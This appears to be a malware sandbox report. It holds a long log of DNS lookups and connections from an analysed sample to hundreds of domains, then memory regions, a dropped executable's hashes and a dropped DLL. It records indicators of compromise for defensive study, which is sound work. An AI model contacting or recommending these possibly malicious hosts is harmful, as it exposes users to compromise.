US 8.8.8.8:53 20.24.191.194.in-addr.arpa udp
US 8.8.8.8:53 65.67.78.195.in-addr.arpa udp
US 8.8.8.8:53 154.174.212.67.in-addr.arpa udp
US 208.113.253.208:443 www.vitalitywealthadvisors.com tcp
US 208.113.253.208:443 www.vitalitywealthadvisors.com tcp
US 8.8.8.8:53 justusleagueconsulting.com udp
US 8.8.8.8:53 knightshorttermrentals.com udp
US 208.113.253.208:443 www.vitalitywealthadvisors.com tcp
US 162.241.203.40:443 universodabelezaesaude.com tcp
GB 99.84.9.52:443 www.transmitdispatchingllc.com tcp
US 50.31.176.166:443 torneodeteniscampestre.com tcp
US 172.67.218.68:443 waynereedyconstruction.com tcp
US 8.8.8.8:53 laacademiadeconduccion.com udp
US 8.8.8.8:53 leahyspharmacyloughrea.com udp
US 8.8.8.8:53 leaninspirationnetwork.com udp
US 8.8.8.8:53 legendary-construction.com udp
US 8.8.8.8:53 luciadamatophotography.com udp
US 8.8.8.8:53 loscaballerosdedurango.com udp
US 8.8.8.8:53 lucianamilessiofficial.com udp
US 8.8.8.8:53 madame-beaute-actuelle.com udp
US 195.179.236.25:443 jcmlandscapingservices.com tcp
US 89.117.139.246:443 zeuscosmeticindustries.com tcp
TR 77.245.159.14:443 www.zonguldakkorogluturizm.com tcp
US 8.8.8.8:53 141.39.254.162.in-addr.arpa udp
US 8.8.8.8:53 198.199.67.172.in-addr.arpa udp
US 8.8.8.8:53 183.155.94.219.in-addr.arpa udp
US 8.8.8.8:53 marketingsoftwaremagic.com udp
FR 51.91.236.193:80 madame-beaute-actuelle.com tcp
US 172.67.192.215:443 legendary-construction.com tcp
US 8.8.8.8:53 memindmeresponsibility.com udp
US 8.8.8.8:53 miamiprestigetransport.com udp
US 8.8.8.8:53 morelifelessloneliness.com udp
US 8.8.8.8:53 movelyfurnitureremoval.com udp
NL 213.249.67.35:443 leaninspirationnetwork.com tcp
US 75.75.243.253:443 knightshorttermrentals.com tcp
US 162.240.14.39:443 justusleagueconsulting.com tcp
FR 89.116.147.51:443 luciadamatophotography.com tcp
GB 141.136.33.13:443 leahyspharmacyloughrea.com tcp
US 8.8.8.8:53 movies-recommendations.com udp
US 8.8.8.8:53 niceinteractionsjp2023.com udp
US 8.8.8.8:53 myplasticsurgeryescape.com udp
BR 154.49.247.20:443 laacademiadeconduccion.com tcp
US 104.21.88.25:443 lucianamilessiofficial.com tcp
US 8.8.8.8:53 orangecountycawellness.com udp
US 8.8.8.8:53 orderpainkillersonline.com udp
US 8.8.8.8:53 115.39.254.162.in-addr.arpa udp
US 8.8.8.8:53 68.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 52.9.84.99.in-addr.arpa udp
US 8.8.8.8:53 40.203.241.162.in-addr.arpa udp
US 8.8.8.8:53 14.159.245.77.in-addr.arpa udp
US 8.8.8.8:53 25.236.179.195.in-addr.arpa udp
US 8.8.8.8:53 246.139.117.89.in-addr.arpa udp
US 8.8.8.8:53 owcpdoctorgreenvillesc.com udp
US 8.8.8.8:53 pacificregentb.wpengine.com udp
US 8.8.8.8:53 patrickjohnsonsoftware.com udp
US 8.8.8.8:53 northernstar-jewellery.com udp
US 8.8.8.8:53 paulspencerphotography.com udp
US 8.8.8.8:53 plumbingservicescanada.com udp
US 162.241.61.133:443 loscaballerosdedurango.com tcp
US 162.241.253.216:80 memindmeresponsibility.com tcp
US 8.8.8.8:53 possessivelyparanormal.com udp
US 8.8.8.8:53 procareinjurysolutions.com udp
DE 168.119.136.101:80 marketingsoftwaremagic.com tcp
US 65.181.111.144:443 movelyfurnitureremoval.com tcp
FR 89.117.169.53:443 morelifelessloneliness.com tcp
US 8.8.8.8:53 pusatwikaservicecenter.com udp
US 54.205.144.65:443 niceinteractionsjp2023.com tcp
US 8.8.8.8:53 queencommerciallaundry.com udp
US 8.8.8.8:53 quintetglobalsolutions.com udp
IE 54.77.140.175:443 movies-recommendations.com tcp
BR 154.56.48.47:443 miamiprestigetransport.com tcp
US 8.8.8.8:53 radiocristalstereojima.com udp
US 8.8.8.8:53 jjsploit.live udp
US 8.8.8.8:53 vezionline.live udp
US 8.8.8.8:53 215.192.67.172.in-addr.arpa udp
US 8.8.8.8:53 193.236.91.51.in-addr.arpa udp
US 8.8.8.8:53 35.67.249.213.in-addr.arpa udp
US 8.8.8.8:53 51.147.116.89.in-addr.arpa udp
US 8.8.8.8:53 13.33.136.141.in-addr.arpa udp
US 8.8.8.8:53 253.243.75.75.in-addr.arpa udp
US 8.8.8.8:53 39.14.240.162.in-addr.arpa udp
US 8.8.8.8:53 25.88.21.104.in-addr.arpa udp
US 8.8.8.8:53 20.247.49.154.in-addr.arpa udp
US 8.8.8.8:53 166.176.31.50.in-addr.arpa udp
US 107.154.154.140:443 myplasticsurgeryescape.com tcp
US 54.215.1.130:443 orangecountycawellness.com tcp
US 172.67.215.157:80 paulspencerphotography.com tcp
US 35.238.127.232:443 pacificregentb.wpengine.com tcp
US 92.204.135.33:443 owcpdoctorgreenvillesc.com tcp
US 162.241.253.135:443 patrickjohnsonsoftware.com tcp
FR 92.204.222.124:443 northernstar-jewellery.com tcp
US 184.94.213.161:443 plumbingservicescanada.com tcp
US 160.153.0.134:443 possessivelyparanormal.com tcp
US 8.8.8.8:53 god77.club udp
US 8.8.8.8:53 urban730.club udp
DE 162.55.100.32:443 quintetglobalsolutions.com tcp
US 160.153.0.156:443 procareinjurysolutions.com tcp
ID 103.7.226.176:443 pusatwikaservicecenter.com tcp
US 23.145.120.19:443 radiocristalstereojima.com tcp
US 173.201.186.53:443 queencommerciallaundry.com tcp
US 8.8.8.8:53 pepeversion3.club udp
US 8.8.8.8:53 resurgents.club udp
US 8.8.8.8:53 theinvisibleyou.club udp
US 8.8.8.8:53 adaf100.click udp
US 8.8.8.8:53 aiproductivityaccelerator.club udp
US 8.8.8.8:53 good78dayday.click udp
US 8.8.8.8:53 iqhub.tech udp
US 8.8.8.8:53 molda.tech udp
US 162.0.232.113:443 vezionline.live tcp
US 8.8.8.8:53 53.169.117.89.in-addr.arpa udp
US 8.8.8.8:53 101.136.119.168.in-addr.arpa udp
US 8.8.8.8:53 133.61.241.162.in-addr.arpa udp
US 8.8.8.8:53 144.111.181.65.in-addr.arpa udp
US 8.8.8.8:53 216.253.241.162.in-addr.arpa udp
US 8.8.8.8:53 47.48.56.154.in-addr.arpa udp
US 8.8.8.8:53 140.154.154.107.in-addr.arpa udp
US 8.8.8.8:53 134.0.153.160.in-addr.arpa udp
US 8.8.8.8:53 157.215.67.172.in-addr.arpa udp
US 8.8.8.8:53 samsal.tech udp
US 8.8.8.8:53 mrkhan.tech udp
US 8.8.8.8:53 linqit.tech udp
US 66.29.146.56:443 jjsploit.live tcp
US 162.241.24.179:443 god77.club tcp
US 8.8.8.8:53 www.jinyao.tech udp
US 8.8.8.8:53 divein2.tech udp
US 8.8.8.8:53 vivity.tech udp
US 8.8.8.8:53 175.140.77.54.in-addr.arpa udp
US 8.8.8.8:53 brglabs.tech udp
US 108.167.143.112:443 urban730.club tcp
US 8.8.8.8:53 invarex.tech udp
US 8.8.8.8:53 humtube.tech udp
US 162.241.225.108:443 theinvisibleyou.club tcp
US 172.67.215.157:443 paulspencerphotography.com tcp
DE 198.251.84.169:443 linqit.tech tcp
US 162.241.226.112:443 mrkhan.tech tcp
US 68.65.122.36:443 resurgents.club tcp
LT 84.32.84.32:443 samsal.tech tcp
JP 163.44.176.16:443 good78dayday.click tcp
US 8.8.8.8:53 232.127.238.35.in-addr.arpa udp
US 8.8.8.8:53 33.135.204.92.in-addr.arpa udp
US 8.8.8.8:53 135.253.241.162.in-addr.arpa udp
US 8.8.8.8:53 161.213.94.184.in-addr.arpa udp
US 8.8.8.8:53 156.0.153.160.in-addr.arpa udp
US 8.8.8.8:53 32.100.55.162.in-addr.arpa udp
US 8.8.8.8:53 176.226.7.103.in-addr.arpa udp
US 8.8.8.8:53 19.120.145.23.in-addr.arpa udp
US 8.8.8.8:53 113.232.0.162.in-addr.arpa udp
JP 163.44.176.16:443 good78dayday.click tcp
US 8.8.8.8:53 nanovibe.tech udp
US 8.8.8.8:53 innovibe.tech udp
US 8.8.8.8:53 grapheen.tech udp
DE 81.169.145.156:80 vivity.tech tcp
CN 121.40.253.244:443 www.jinyao.tech tcp
IN 89.117.27.190:443 brglabs.tech tcp
LT 84.32.84.32:443 samsal.tech tcp
US 8.8.8.8:53 devwebwp.tech udp
US 8.8.8.8:53 shoeshub.tech udp
US 8.8.8.8:53 cardcube.tech udp
US 8.8.8.8:53 blacklove.tech udp
US 8.8.8.8:53 futuroit.tech udp
US 8.8.8.8:53 biomedico.tech udp
US 195.35.33.219:443 humtube.tech tcp
US 8.8.8.8:53 codeproz.tech udp
US 8.8.8.8:53 avialearn.tech udp
US 8.8.8.8:53 natewhite.tech udp
US 8.8.8.8:53 newsdekho.tech udp
US 8.8.8.8:53 skillspro.tech udp
US 8.8.8.8:53 179.24.241.162.in-addr.arpa udp
US 8.8.8.8:53 56.146.29.66.in-addr.arpa udp
US 8.8.8.8:53 112.143.167.108.in-addr.arpa udp
US 8.8.8.8:53 108.225.241.162.in-addr.arpa udp
US 8.8.8.8:53 iazstudio.tech udp
US 8.8.8.8:53 gamestop20.tech udp
US 8.8.8.8:53 cabsandbox.tech udp
CZ 46.28.105.4:80 invarex.tech tcp
US 8.8.8.8:53 altarturih.tech udp
US 8.8.8.8:53 adonovanwp.tech udp
US 8.8.8.8:53 farmcentral.tech udp
US 8.8.8.8:53 digitaljiya.tech udp
US 8.8.8.8:53 goldenfxroi.tech udp
US 149.100.151.55:443 grapheen.tech tcp
GB 185.77.97.90:443 innovibe.tech tcp
IN 89.117.27.195:443 nanovibe.tech tcp
US 195.35.38.194:443 devwebwp.tech tcp
US 8.8.8.8:53 shwetadixit.tech udp
US 8.8.8.8:53 technovarise.tech udp
US 8.8.8.8:53 chetansawle.tech udp
US 8.8.8.8:53 signfireinfo.tech udp
US 8.8.8.8:53 4esci-europe.com udp
US 8.8.8.8:53 gamesonline9.tech udp
US 8.8.8.8:53 gamesonline7.tech udp
US 8.8.8.8:53 gamesonline8.tech udp
US 8.8.8.8:53 32.84.32.84.in-addr.arpa udp
US 8.8.8.8:53 169.84.251.198.in-addr.arpa udp
US 8.8.8.8:53 112.226.241.162.in-addr.arpa udp
US 8.8.8.8:53 16.176.44.163.in-addr.arpa udp
CA 23.227.38.65:443 blacklove.tech tcp
SG 217.21.74.44:443 avialearn.tech tcp
US 185.212.71.30:443 skillspro.tech tcp
US 149.100.151.72:443 natewhite.tech tcp
IN 89.117.157.49:443 codeproz.tech tcp
US 162.241.244.59:443 gamestop20.tech tcp
US 86.38.202.143:443 futuroit.tech tcp
US 50.87.146.148:443 cabsandbox.tech tcp
US 86.38.202.150:443 cardcube.tech tcp
US 8.8.8.8:53 156.145.169.81.in-addr.arpa udp
US 8.8.8.8:53 190.27.117.89.in-addr.arpa udp
US 8.8.8.8:53 deskpit.de udp
US 8.8.8.8:53 gamesonline6.tech udp
US 8.8.8.8:53 gamesonline5.tech udp
US 8.8.8.8:53 gotatibetana.tech udp
US 216.92.109.79:443 biomedico.tech tcp
US 162.241.24.179:443 goldenfxroi.tech tcp
US 8.8.8.8:53 pivotalworks.tech udp
US 195.179.236.72:443 adonovanwp.tech tcp
IN 68.178.149.104:443 shwetadixit.tech tcp
IN 89.117.157.156:443 digitaljiya.tech tcp
US 195.179.237.69:443 technovarise.tech tcp
IN 217.21.84.204:443 chetansawle.tech tcp
US 66.29.132.84:443 altarturih.tech tcp
DE 217.160.0.97:443 4esci-europe.com tcp
US 8.8.8.8:53 219.33.35.195.in-addr.arpa udp
US 8.8.8.8:53 90.97.77.185.in-addr.arpa udp
US 8.8.8.8:53 195.27.117.89.in-addr.arpa udp
US 8.8.8.8:53 55.151.100.149.in-addr.arpa udp
US 8.8.8.8:53 194.38.35.195.in-addr.arpa udp
ID 153.92.9.66:443 gamesonline5.tech tcp
ID 153.92.9.66:443 gamesonline5.tech tcp
ID 153.92.9.66:443 gamesonline5.tech tcp
US 8.8.8.8:53 gamesonline4.tech udp
US 8.8.8.8:53 gamesonline3.tech udp
US 8.8.8.8:53 gamesonline2.tech udp
US 8.8.8.8:53 igniteproduct.tech udp
US 50.16.92.190:80 farmcentral.tech tcp
US 63.250.43.135:443 signfireinfo.tech tcp
US 8.8.8.8:53 gamesonline10.tech udp
ID 153.92.9.66:443 gamesonline10.tech tcp
ID 153.92.9.66:443 gamesonline10.tech tcp
DE 81.169.145.90:80 deskpit.de tcp
US 162.241.24.158:80 pivotalworks.tech tcp
US 8.8.8.8:53 guestsolutions.tech udp
US 8.8.8.8:53 circuitmasters.tech udp
ID 153.92.9.66:443 gamesonline10.tech tcp
ID 153.92.9.66:443 gamesonline10.tech tcp
US 8.8.8.8:53 rankyourwebsite.tech udp
US 50.87.233.13:443 igniteproduct.tech tcp
US 154.49.142.60:443 guestsolutions.tech tcp
US 8.8.8.8:53 65.38.227.23.in-addr.arpa udp
US 8.8.8.8:53 49.157.117.89.in-addr.arpa udp
US 8.8.8.8:53 72.151.100.149.in-addr.arpa udp
US 8.8.8.8:53 59.244.241.162.in-addr.arpa udp
US 8.8.8.8:53 148.146.87.50.in-addr.arpa udp
US 8.8.8.8:53 30.71.212.185.in-addr.arpa udp
US 8.8.8.8:53 150.202.38.86.in-addr.arpa udp
US 8.8.8.8:53 44.74.21.217.in-addr.arpa udp
US 8.8.8.8:53 143.202.38.86.in-addr.arpa udp
US 8.8.8.8:53 79.109.92.216.in-addr.arpa udp
US 8.8.8.8:53 72.236.179.195.in-addr.arpa udp
US 8.8.8.8:53 69.237.179.195.in-addr.arpa udp
US 8.8.8.8:53 156.157.117.89.in-addr.arpa udp
US 8.8.8.8:53 204.84.21.217.in-addr.arpa udp
US 8.8.8.8:53 97.0.160.217.in-addr.arpa udp
US 8.8.8.8:53 84.132.29.66.in-addr.arpa udp
US 8.8.8.8:53 90.145.169.81.in-addr.arpa udp
FR 89.117.169.99:443 circuitmasters.tech tcp
US 8.8.8.8:53 190.92.16.50.in-addr.arpa udp
US 8.8.8.8:53 numerikamarketing.tech udp
ID 153.92.9.66:443 gamesonline10.tech tcp
ID 153.92.9.66:443 gamesonline10.tech tcp
US 8.8.8.8:53 cortexinnovations.tech udp
US 8.8.8.8:53 comprasbrasilonline.tech udp
DE 81.169.145.90:443 deskpit.de tcp
US 8.8.8.8:53 nativetechsolutions.tech udp
LT 84.32.84.32:443 rankyourwebsite.tech tcp
US 8.8.8.8:53 advanced-connectivity.tech udp
US 63.250.43.3:443 cortexinnovations.tech tcp
NL 185.166.188.44:443 numerikamarketing.tech tcp
US 8.8.8.8:53 zginformationtechnology.tech udp
US 8.8.8.8:53 pornvideos.buzz udp
US 104.21.34.194:443 nativetechsolutions.tech tcp
US 8.8.8.8:53 phimsexhay.buzz udp
US 8.8.8.8:53 smaak.space udp
US 8.8.8.8:53 hachi.space udp
US 8.8.8.8:53 135.43.250.63.in-addr.arpa udp
US 8.8.8.8:53 158.24.241.162.in-addr.arpa udp
US 8.8.8.8:53 66.9.92.153.in-addr.arpa udp
US 8.8.8.8:53 99.169.117.89.in-addr.arpa udp
US 8.8.8.8:53 13.233.87.50.in-addr.arpa udp
US 8.8.8.8:53 60.142.49.154.in-addr.arpa udp
US 8.8.8.8:53 44.188.166.185.in-addr.arpa udp
US 8.8.8.8:53 3.43.250.63.in-addr.arpa udp
DE 217.160.0.198:443 advanced-connectivity.tech tcp
US 8.8.8.8:53 aistock.space udp
US 8.8.8.8:53 wildfree.space udp
US 191.101.13.28:443 zginformationtechnology.tech tcp
US 172.67.132.43:443 phimsexhay.buzz tcp
US 191.101.13.198:443 aistock.space tcp
SG 156.67.222.242:443 hachi.space tcp
NL 185.182.56.12:80 smaak.space tcp
US 8.8.8.8:53 juabeblog.space udp
US 194.163.45.177:443 pornvideos.buzz tcp
US 8.8.8.8:53 kaypablog.space udp
US 104.21.80.73:443 juabeblog.space tcp
US 104.21.90.60:443 kaypablog.space tcp
US 8.8.8.8:53 hosterfast.space udp
US 8.8.8.8:53 antirungkad.space udp
US 104.21.48.197:80 hosterfast.space tcp
US 3.33.130.190:443 antirungkad.space tcp
US 8.8.8.8:53 194.34.21.104.in-addr.arpa udp
US 8.8.8.8:53 198.0.160.217.in-addr.arpa udp
US 8.8.8.8:53 43.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 28.13.101.191.in-addr.arpa udp
US 8.8.8.8:53 12.56.182.185.in-addr.arpa udp
US 8.8.8.8:53 198.13.101.191.in-addr.arpa udp
US 8.8.8.8:53 177.45.163.194.in-addr.arpa udp
US 8.8.8.8:53 73.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 60.90.21.104.in-addr.arpa udp
US 8.8.8.8:53 242.222.67.156.in-addr.arpa udp
US 8.8.8.8:53 homemsaudavell.space udp
US 8.8.8.8:53 jeanyvesbonnet.space udp
US 8.8.8.8:53 www.intrattenimento.space udp
US 8.8.8.8:53 dssl.pro udp
US 8.8.8.8:53 ivps.pro udp
US 8.8.8.8:53 canvo.pro udp
US 8.8.8.8:53 ezseo.pro udp
US 8.8.8.8:53 apklili.pro udp
US 8.8.8.8:53 burton.pro udp
US 8.8.8.8:53 siamseo.pro udp
US 8.8.8.8:53 spayafa.pro udp
US 8.8.8.8:53 vz99bet.pro udp
US 8.8.8.8:53 memeable.pro udp
US 8.8.8.8:53 sailaway.pro udp
US 8.8.8.8:53 ku11-77vn.pro udp
US 8.8.8.8:53 rapidmesh.pro udp
US 8.8.8.8:53 weathersh.pro udp
US 104.21.55.131:443 ivps.pro tcp
US 44.230.85.241:443 canvo.pro tcp
FR 51.91.236.193:80 jeanyvesbonnet.space tcp
BR 89.116.58.127:443 homemsaudavell.space tcp
US 8.8.8.8:53 197.48.21.104.in-addr.arpa udp
US 8.8.8.8:53 190.130.33.3.in-addr.arpa udp
UA 91.222.136.254:443 www.intrattenimento.space tcp
US 160.153.0.123:443 dssl.pro tcp
GB 5.134.14.225:443 burton.pro tcp
US 8.8.8.8:53 cloud2tech.pro udp
US 172.67.143.159:443 vz99bet.pro tcp
US 172.67.214.78:443 ku11-77vn.pro tcp
US 172.67.223.166:443 sailaway.pro tcp
US 172.67.152.47:80 weathersh.pro tcp
US 86.38.202.88:443 rapidmesh.pro tcp
IN 89.117.188.243:443 apklili.pro tcp
US 89.117.139.185:443 siamseo.pro tcp
US 8.8.8.8:53 imperfecta.pro udp
US 68.178.246.77:80 ezseo.pro tcp
US 8.8.8.8:53 moonchocolatecbar.com udp
GB 84.32.41.15:443 cloud2tech.pro tcp
US 8.8.8.8:53 mousetrapcreative.com udp
US 8.8.8.8:53 neurobrainoficial.com udp
US 8.8.8.8:53 nerdyhansofficial.com udp
US 8.8.8.8:53 131.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 123.0.153.160.in-addr.arpa udp
US 8.8.8.8:53 254.136.222.91.in-addr.arpa udp
US 8.8.8.8:53 241.85.230.44.in-addr.arpa udp
US 8.8.8.8:53 127.58.116.89.in-addr.arpa udp
US 8.8.8.8:53 225.14.134.5.in-addr.arpa udp
US 8.8.8.8:53 159.143.67.172.in-addr.arpa udp
US 8.8.8.8:53 78.214.67.172.in-addr.arpa udp
US 8.8.8.8:53 166.223.67.172.in-addr.arpa udp
US 8.8.8.8:53 47.152.67.172.in-addr.arpa udp
US 8.8.8.8:53 newportharvestcog.com udp
US 191.96.56.194:443 moonchocolatecbar.com tcp
US 104.21.45.22:443 imperfecta.pro tcp
US 172.67.174.16:443 mousetrapcreative.com tcp
US 104.21.83.116:443 nerdyhansofficial.com tcp
BR 154.49.247.18:443 neurobrainoficial.com tcp
US 54.173.137.223:80 newportharvestcog.com tcp
US 8.8.8.8:53 nhathuocthephuong.com udp
US 8.8.8.8:53 www.btcmine.cc udp
GB 142.250.200.19:443 www.btcmine.cc tcp
US 8.8.8.8:53 www.nimestatemedicine.com udp
VN 103.74.118.169:443 nhathuocthephuong.com tcp
US 8.8.8.8:53 nirmalpolyplastic.com udp
US 8.8.8.8:53 88.202.38.86.in-addr.arpa udp
US 8.8.8.8:53 185.139.117.89.in-addr.arpa udp
US 8.8.8.8:53 243.188.117.89.in-addr.arpa udp
US 8.8.8.8:53 15.41.32.84.in-addr.arpa udp
US 8.8.8.8:53 22.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 16.174.67.172.in-addr.arpa udp
US 8.8.8.8:53 194.56.96.191.in-addr.arpa udp
US 8.8.8.8:53 116.83.21.104.in-addr.arpa udp
US 8.8.8.8:53 223.137.173.54.in-addr.arpa udp
US 8.8.8.8:53 18.247.49.154.in-addr.arpa udp
US 8.8.8.8:53 19.200.250.142.in-addr.arpa udp
US 173.236.240.231:443 www.nimestatemedicine.com tcp
US 8.8.8.8:53 nocityfordreaming.com udp
US 8.8.8.8:53 www.blogger.com udp
US 8.8.8.8:53 ofallongaragedoor.com udp
US 8.8.8.8:53 omegaacumuladores.com udp
US 8.8.8.8:53 officiallwebsiite.com udp
IN 103.180.121.28:443 nirmalpolyplastic.com tcp
US 66.33.199.103:443 nocityfordreaming.com tcp
GB 216.58.201.105:443 www.blogger.com tcp
FR 193.70.117.88:443 omegaacumuladores.com tcp
US 8.8.8.8:53 opironruck.wpengine.com udp
US 149.100.151.36:443 officiallwebsiite.com tcp
US 8.8.8.8:53 papasconmojogames.com udp
US 8.8.8.8:53 oreghegyvendeghaz.com udp
US 8.8.8.8:53 hitclubgame24.online udp
US 8.8.8.8:53 hitclubgame25.online udp
US 8.8.8.8:53 169.118.74.103.in-addr.arpa udp
US 8.8.8.8:53 231.240.236.173.in-addr.arpa udp
US 8.8.8.8:53 105.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 28.121.180.103.in-addr.arpa udp
US 8.8.8.8:53 88.117.70.193.in-addr.arpa udp
US 8.8.8.8:53 103.199.33.66.in-addr.arpa udp
US 8.8.8.8:53 hitclubgame26.online udp
US 8.8.8.8:53 insuresmartly.online udp
US 104.196.225.196:443 opironruck.wpengine.com tcp
US 8.8.8.8:53 www.linux-for-all.online udp
N/A 192.168.100.6:443 papasconmojogames.com tcp
US 8.8.8.8:53 madison-decor.online udp
US 8.8.8.8:53 mnemo-english.online udp
US 8.8.8.8:53 mysmartliving.online udp
US 8.8.8.8:53 accounts.google.com udp
US 172.67.162.232:443 hitclubgame25.online tcp
US 8.8.8.8:53 technosreview.online udp
US 104.21.58.203:443 hitclubgame26.online tcp
US 104.21.85.215:443 hitclubgame24.online tcp
PL 77.55.153.146:443 www.linux-for-all.online tcp
HU 217.13.97.42:443 oreghegyvendeghaz.com tcp
BE 64.233.167.84:443 accounts.google.com tcp
IN 62.72.28.38:443 technosreview.online tcp
US 8.8.8.8:53 36.151.100.149.in-addr.arpa udp
US 8.8.8.8:53 196.225.196.104.in-addr.arpa udp
US 8.8.8.8:53 232.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 203.58.21.104.in-addr.arpa udp
NL 185.219.81.139:80 mnemo-english.online tcp
US 8.8.8.8:53 telenovelashd.online udp
US 8.8.8.8:53 testing-world.online udp
US 8.8.8.8:53 travelingcity.online udp
US 8.8.8.8:53 testinflooens.online udp
US 8.8.8.8:53 uptownmonster.online udp
PL 185.208.164.24:80 mysmartliving.online tcp
US 8.8.8.8:53 vitamindiskon.online udp
US 8.8.8.8:53 vidarbhadaily.online udp
US 8.8.8.8:53 aba-conference.online udp
US 50.16.92.190:443 farmcentral.tech tcp
US 172.67.143.8:443 telenovelashd.online tcp
US 8.8.8.8:53 ayamgorengfood.online udp
US 8.8.8.8:53 clubmultiverso.online udp
US 8.8.8.8:53 operationironruck.com udp
IN 82.180.142.160:443 testinflooens.online tcp
US 34.120.137.41:443 travelingcity.online tcp
US 8.8.8.8:53 146.153.55.77.in-addr.arpa udp
US 8.8.8.8:53 42.97.13.217.in-addr.arpa udp
US 8.8.8.8:53 84.167.233.64.in-addr.arpa udp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 139.81.219.185.in-addr.arpa udp
US 8.8.8.8:53 38.28.72.62.in-addr.arpa udp
US 8.8.8.8:53 24.164.208.185.in-addr.arpa udp
US 8.8.8.8:53 combaterefluxo.online udp
US 8.8.8.8:53 goodtimingnews.online udp
KZ 92.118.115.65:443 aba-conference.online tcp
FR 89.117.169.195:443 testing-world.online tcp
NL 141.138.169.243:443 uptownmonster.online tcp
SG 45.13.133.16:443 vitamindiskon.online tcp
US 8.8.8.8:53 www.hostingelshafei.net udp
US 8.8.8.8:53 josetteleblanc.online udp
US 8.8.8.8:53 mnemo-english.ru udp
US 8.8.8.8:53 odettedimitriu.online udp
US 141.193.213.10:443 operationironruck.com tcp
BR 154.49.247.181:443 combaterefluxo.online tcp
LT 84.32.84.32:443 goodtimingnews.online tcp
US 8.8.8.8:53 pingatistiadat.online udp
US 8.8.8.8:53 revolutintools.online udp
US 8.8.8.8:53 tbmotorsdirect.online udp
US 8.8.8.8:53 jainhealthcare.online udp
US 8.8.8.8:53 www.nocityfordreaming.com udp
SG 45.80.183.92:443 clubmultiverso.online tcp
US 8.8.8.8:53 8.143.67.172.in-addr.arpa udp
US 8.8.8.8:53 41.137.120.34.in-addr.arpa udp
US 8.8.8.8:53 195.169.117.89.in-addr.arpa udp
US 8.8.8.8:53 160.142.180.82.in-addr.arpa udp
US 8.8.8.8:53 65.115.118.92.in-addr.arpa udp
US 8.8.8.8:53 243.169.138.141.in-addr.arpa udp
US 8.8.8.8:53 trykeravitapro.online udp
US 8.8.8.8:53 vivercomsaude1.online udp
US 8.8.8.8:53 desingdamascena.online udp
US 8.8.8.8:53 bwgrinvestments.online udp
PL 185.208.164.24:80 josetteleblanc.online tcp
US 172.67.187.206:443 www.hostingelshafei.net tcp
NL 185.219.81.139:80 mnemo-english.ru tcp
IN 86.38.243.25:443 jainhealthcare.online tcp
US 104.21.19.77:443 tbmotorsdirect.online tcp
SG 85.187.128.42:443 pingatistiadat.online tcp
US 8.8.8.8:53 digitalisuccess.online udp
US 8.8.8.8:53 drakesdetailing.online udp
US 8.8.8.8:53 forexpowertrade.online udp
US 66.33.199.103:443 www.nocityfordreaming.com tcp
US 8.8.8.8:53 goldencolors263.online udp
US 8.8.8.8:53 howtofixwebsite.online udp
BR 45.132.157.236:443 trykeravitapro.online tcp
US 8.8.8.8:53 lashaccessories.online udp
US 8.8.8.8:53 gustavooliveira.online udp
US 8.8.8.8:53 growthtraderpro.online udp
US 8.8.8.8:53 10.213.193.141.in-addr.arpa udp
US 8.8.8.8:53 181.247.49.154.in-addr.arpa udp
US 8.8.8.8:53 16.133.13.45.in-addr.arpa udp
US 8.8.8.8:53 92.183.80.45.in-addr.arpa udp
US 8.8.8.8:53 206.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 poderfeminino25.online udp
BR 149.100.155.19:443 vivercomsaude1.online tcp
US 8.8.8.8:53 ratneshkushwaha.online udp
BR 191.6.222.25:443 desingdamascena.online tcp
IN 89.117.188.67:443 digitalisuccess.online tcp
US 198.143.137.44:443 bwgrinvestments.online tcp
US 151.101.194.159:443 drakesdetailing.online tcp
GB 153.92.6.22:443 goldencolors263.online tcp
US 8.8.8.8:53 revolutiontools.online udp
US 8.8.8.8:53 salemcollection.online udp
US 8.8.8.8:53 storyrueangsiao.online udp
US 8.8.8.8:53 sunshinetraders.online udp
US 8.8.8.8:53 taxihatinhgiare.online udp
SG 217.21.74.225:443 poderfeminino25.online tcp
US 8.8.8.8:53 deltatajhomestay.online udp
US 8.8.8.8:53 77.19.21.104.in-addr.arpa udp
US 8.8.8.8:53 25.243.38.86.in-addr.arpa udp
US 8.8.8.8:53 42.128.187.85.in-addr.arpa udp
US 8.8.8.8:53 236.157.132.45.in-addr.arpa udp
US 8.8.8.8:53 67.188.117.89.in-addr.arpa udp
US 8.8.8.8:53 159.194.101.151.in-addr.arpa udp
US 8.8.8.8:53 19.155.100.149.in-addr.arpa udp
US 8.8.8.8:53 25.222.6.191.in-addr.arpa udp
US 8.8.8.8:53 22.6.92.153.in-addr.arpa udp
US 8.8.8.8:53 44.137.143.198.in-addr.arpa udp
US 89.117.9.231:443 howtofixwebsite.online tcp
IN 89.117.157.229:443 ratneshkushwaha.online tcp
IN 89.117.188.110:443 growthtraderpro.online tcp
US 8.8.8.8:53 educationmasters.online udp
US 8.8.8.8:53 gameapplications.online udp
SG 156.67.222.79:443 storyrueangsiao.online tcp
US 92.204.132.36:80 salemcollection.online tcp
US 8.8.8.8:53 healthcalculator.online udp
PL 185.208.164.24:80 sunshinetraders.online tcp

Files

memory/2556-1-0x00000000023E0000-0x00000000024E0000-memory.dmp

memory/2556-2-0x0000000004020000-0x000000000402B000-memory.dmp

memory/2556-3-0x0000000000400000-0x00000000022D1000-memory.dmp

memory/3512-4-0x0000000003170000-0x0000000003186000-memory.dmp

memory/2556-5-0x0000000000400000-0x00000000022D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EC25.exe

MD5 0904e849f8483792ef67991619ece915
SHA1 58d04535efa58effb3c5ed53a2462aa96d676b79
SHA256 fca631b3198194fcc0c619b5690dbde2e9f38afb1b978bab8ea3f92b572ce1ef
SHA512 258fc59050aa455ad56167dd1bbe5e098eefc0f3e950c90d89bac2aa74abb5cfa1710d866c0e28e58dcb2f914736470a4dd9838dd6412b633aee87d71b867cf5

memory/2248-15-0x00000000018D0000-0x00000000018D1000-memory.dmp

memory/2248-17-0x0000000000AD0000-0x000000000137F000-memory.dmp

memory/2248-16-0x0000000000AD0000-0x000000000137F000-memory.dmp

memory/2248-21-0x00000000018E0000-0x00000000018E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F231.dll

